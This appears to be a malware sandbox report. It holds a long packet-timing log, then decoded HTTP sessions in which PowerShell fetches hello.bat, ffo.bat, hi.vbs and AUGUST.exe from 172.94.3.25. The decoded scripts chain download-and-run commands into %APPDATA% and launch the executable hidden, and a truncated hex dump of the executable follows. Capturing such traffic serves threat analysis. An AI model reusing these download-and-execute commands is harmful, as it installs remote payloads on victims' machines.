                                        Sep 25, 2024 18:40:31.937781096 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.937798023 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.937824011 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.937836885 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.937839985 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.937856913 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.937863111 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.937875032 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.937891960 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.937892914 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.937928915 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.937982082 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.937999010 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938025951 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938039064 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.938043118 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938059092 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938076973 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938082933 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.938093901 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938111067 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938118935 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.938127041 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938143969 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938143969 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.938160896 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938177109 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938194990 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938199997 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.938213110 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938225985 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.938254118 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.938301086 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938318014 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938333988 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938350916 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938358068 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.938393116 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.938395023 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938412905 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938430071 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938446045 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938453913 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.938462973 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938499928 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.938700914 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938719034 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938735962 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938796997 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.938796997 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.938798904 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938816071 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938832998 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938849926 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938860893 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.938891888 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.938956976 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938972950 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938990116 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939004898 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939013004 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.939023018 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939038038 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939043045 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.939054966 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939080954 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.939090014 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939105988 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939131975 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939146996 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939155102 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.939162970 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.939163923 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939182043 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939198971 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.939205885 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939223051 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939244986 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.939338923 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939378977 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939419031 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.939424038 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939454079 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939461946 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.939471006 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939487934 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939505100 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939517975 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.939543962 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.939599991 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939616919 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939632893 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939650059 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939666033 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939668894 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.939682961 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939692974 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.939699888 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939717054 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939724922 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.939734936 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939749956 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.939791918 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939814091 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939830065 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939846992 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939851999 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.939867020 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939878941 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.939883947 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939907074 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.939925909 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939941883 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939956903 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939971924 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939980984 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.939987898 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.940006971 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.940026999 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.156796932 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.162317038 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.199556112 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.199624062 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.201394081 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201427937 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201441050 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201479912 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.201525927 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201539040 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201550007 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201564074 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201584101 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201587915 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.201596975 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201611042 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201625109 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201633930 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.201637983 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201666117 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.201695919 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.201705933 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201718092 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201730013 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201741934 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201756954 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201772928 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.201801062 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.201898098 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201910019 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201921940 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201934099 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201944113 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201946020 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.201956034 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201966047 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.201968908 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201980114 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201992989 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201998949 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.202004910 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202018976 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202032089 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202034950 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.202054024 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.202177048 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202189922 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202200890 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202213049 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202217102 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.202224016 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202235937 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202236891 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.202246904 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202259064 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202265024 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.202271938 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202284098 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.202292919 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202303886 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202313900 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202318907 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.202328920 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202337027 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.202342987 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202366114 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.202477932 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202491045 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202502966 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202513933 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202524900 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.202526093 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202543020 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202555895 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202563047 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.202567101 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202584028 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.202588081 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202599049 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202600956 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.202610016 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202625036 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.202630043 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202641964 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202651978 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.202651978 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202663898 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202677965 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.202687025 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202698946 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202702999 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.202712059 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202723980 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202737093 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202739000 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.202775955 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.202873945 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202887058 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202898979 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202910900 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202914953 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.202924013 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202936888 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202944040 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.202950001 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202961922 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202970982 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.202975988 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202985048 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.203006983 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.203012943 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.203017950 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.203030109 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.203043938 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.203057051 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.203061104 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.203068018 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.203078985 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.203080893 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.203099966 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.203107119 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.203111887 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.203139067 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.203142881 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.203155041 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.203166008 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.203177929 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.203198910 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.380359888 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.837034941 CEST4971680192.168.2.6172.94.3.25

                                        HTTP Request Dependency Graph

                                        • 172.94.3.25

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.649712172.94.3.25801780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 25, 2024 18:40:19.820483923 CEST165OUTGET /hello.bat HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                        Host: 172.94.3.25
                                        Connection: Keep-Alive
                                        Sep 25, 2024 18:40:20.474911928 CEST471INHTTP/1.1 200 OK
                                        Content-Length: 191
                                        Last-Modified: Wed, 25 Sep 2024 10:20:05 GMT
                                        Content-Type: text/plain
                                        Date: Wed, 25 Sep 2024 16:40:20 GMT
                                        ETag: "61c1b5c0651739d6d3bd507f4edc42b8-1727259605-191"
                                        Accept-Ranges: bytes
                                        Server: WsgiDAV/4.3.3 Cheroot/10.0.1 Python/3.12.2
                                        Data Raw: 40 65 63 68 6f 20 6f 66 66 0d 0a 70 6f 77 65 72 73 68 65 6c 6c 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 32 2e 39 34 2e 33 2e 32 35 2f 66 66 6f 2e 62 61 74 20 2d 4f 75 74 46 69 6c 65 20 25 41 50 50 44 41 54 41 25 2f 66 66 6f 2e 62 61 74 0d 0a 70 6f 77 65 72 73 68 65 6c 6c 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 32 2e 39 34 2e 33 2e 32 35 2f 68 69 2e 76 62 73 20 2d 4f 75 74 46 69 6c 65 20 25 41 50 50 44 41 54 41 25 2f 68 69 2e 76 62 73 0d 0a 73 74 61 72 74 20 2f 6d 69 6e 20 63 6d 64 20 2f 63 20 25 41 50 50 44 41 54 41 25 2f 68 69 2e 76 62 73 0d 0a 65 78 69 74
                                        Data Ascii: @echo offpowershell wget http://172.94.3.25/ffo.bat -OutFile %APPDATA%/ffo.batpowershell wget http://172.94.3.25/hi.vbs -OutFile %APPDATA%/hi.vbsstart /min cmd /c %APPDATA%/hi.vbsexit


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.649713172.94.3.25801584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 25, 2024 18:40:21.193124056 CEST163OUTGET /ffo.bat HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                        Host: 172.94.3.25
                                        Connection: Keep-Alive
                                        Sep 25, 2024 18:40:21.857218027 CEST280INHTTP/1.1 200 OK
                                        Content-Length: 116
                                        Last-Modified: Wed, 25 Sep 2024 10:10:11 GMT
                                        Content-Type: text/plain
                                        Date: Wed, 25 Sep 2024 16:40:21 GMT
                                        ETag: "df2e60705fdf43715c85c86652fee62b-1727259011-116"
                                        Accept-Ranges: bytes
                                        Server: WsgiDAV/4.3.3 Cheroot/10.0.1 Python/3.12.2
                                        Sep 25, 2024 18:40:22.006005049 CEST116INData Raw: 40 65 63 68 6f 20 6f 66 66 0d 0a 70 6f 77 65 72 73 68 65 6c 6c 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 32 2e 39 34 2e 33 2e 32 35 2f 41 55 47 55 53 54 2e 65 78 65 20 2d 4f 75 74 46 69 6c 65 20 25 41 50 50 44 41 54 41 25 2f 41 55 47 55 53 54
                                        Data Ascii: @echo offpowershell wget http://172.94.3.25/AUGUST.exe -OutFile %APPDATA%/AUGUST.exestart %APPDATA%/AUGUST.exe


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.649714172.94.3.25806600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 25, 2024 18:40:24.072037935 CEST162OUTGET /hi.vbs HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                        Host: 172.94.3.25
                                        Connection: Keep-Alive
                                        Sep 25, 2024 18:40:24.737482071 CEST420INHTTP/1.1 200 OK
                                        Content-Length: 126
                                        Last-Modified: Wed, 25 Sep 2024 10:18:03 GMT
                                        Content-Type: application/octet-stream
                                        Date: Wed, 25 Sep 2024 16:40:24 GMT
                                        ETag: "5374c228c78d8b24803c35ae359f5b7e-1727259483-126"
                                        Accept-Ranges: bytes
                                        Server: WsgiDAV/4.3.3 Cheroot/10.0.1 Python/3.12.2
                                        Data Raw: 53 65 74 20 57 73 68 53 68 65 6c 6c 20 3d 20 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 20 0d 0a 57 73 68 53 68 65 6c 6c 2e 52 75 6e 20 63 68 72 28 33 34 29 20 26 20 22 25 41 50 50 44 41 54 41 25 2f 66 66 6f 2e 62 61 74 22 20 26 20 43 68 72 28 33 34 29 2c 20 30 0d 0a 53 65 74 20 57 73 68 53 68 65 6c 6c 20 3d 20 4e 6f 74 68 69 6e 67
                                        Data Ascii: Set WshShell = CreateObject("WScript.Shell") WshShell.Run chr(34) & "%APPDATA%/ffo.bat" & Chr(34), 0Set WshShell = Nothing


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        3192.168.2.649716172.94.3.25804904C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 25, 2024 18:40:27.133619070 CEST166OUTGET /AUGUST.exe HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                        Host: 172.94.3.25
                                        Connection: Keep-Alive
                                        Sep 25, 2024 18:40:27.767301083 CEST1236INHTTP/1.1 200 OK
                                        Content-Length: 4809996
                                        Last-Modified: Wed, 25 Sep 2024 11:52:30 GMT
                                        Content-Type: application/x-msdownload
                                        Date: Wed, 25 Sep 2024 16:40:27 GMT
                                        ETag: "f30293f7a768b837cdb37fc8b138e7a1-1727265150-4809996"
                                        Accept-Ranges: bytes
                                        Server: WsgiDAV/4.3.3 Cheroot/10.0.1 Python/3.12.2
                                        Data Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 7e f8 26 4c 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 14 01 00 00 c8 01 00 00 00 00 00 ef 1d 01 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 30 03 00 00 02 00 00 02 33 03 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc 50 01 00 b4 00 00 00 00 a0 01 00 04 8d 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
